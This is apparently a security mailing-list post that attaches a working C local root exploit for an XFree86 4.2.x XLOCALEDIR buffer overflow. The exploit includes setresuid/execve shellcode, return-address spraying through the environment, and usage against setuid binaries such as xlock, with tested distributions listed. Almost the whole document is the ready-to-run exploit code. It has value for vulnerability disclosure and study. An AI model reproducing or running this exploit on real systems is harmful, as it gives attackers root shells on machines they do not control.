Hi all,
exploit attached.
Comments are welcome.
Sincerely,
+-------------------------------------------------------------------+
| Agazzini Maurizio Tel: +39-011-32.72.100 |
| Security Analyst Fax: +39-011-32.46.497 |
| @ Mediaservice.net S.R.L. D.S.D. Data Security Division |
| |
| PGP Key : http://www.wayreth.eu.org/Inode.asc |
| Disclaimer: http://@Mediaservice.net/disclaimer |
+-------------------------------------------------------------------+
/*
Original exploit:
** oC-localX.c - XFree86 Version 4.2.x local root exploit
** By dcryptr && tarranta / oC
This exploit is a modified version of the original oC-localX.c
built to work without any offset.
Some distro have the file: /usr/X11R6/bin/dga +s
This program isn't exploitable because it drops privileges
before running the Xlib function vulnerable to this overflow.
This exploit works on linux x86 on all distro.
Tested on:
- Slackware 8.1 ( xlock, xscreensaver, xterm)
- Redhat 7.3 ( manual +s to xlock )
- Suse 8.1 ( manual +s to xlock )
by Inode <inode@mediaservice.net>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
static char shellcode[] =
/* setresuid(0,0,0); */
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
/* /bin/sh execve(); */
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
/* exit(0); */
"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";
#define ALIGN 0
int main(int argc, char **argv)
{
char buffer[6000];
int i;
int ret;
char *env[3] = {buffer,shellcode, NULL};
int *ap;
strcpy(buffer, "XLOCALEDIR=");
printf("\nXFree86 4.2.x Exploit modified by Inode <inode@mediaservice.net>\n\n");
if( argc != 3 )
{
printf(" Usage: %s <full path> <name>\n",argv[0]);
printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n",argv[0]);
return 1;
}
ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]) ;
ap = (int *)( buffer + ALIGN + strlen(buffer) );
for (i = 0; i < sizeof(buffer); i += 4)
*ap++ = ret;
execle(argv[1], argv[2], NULL, env);
return(0);
}
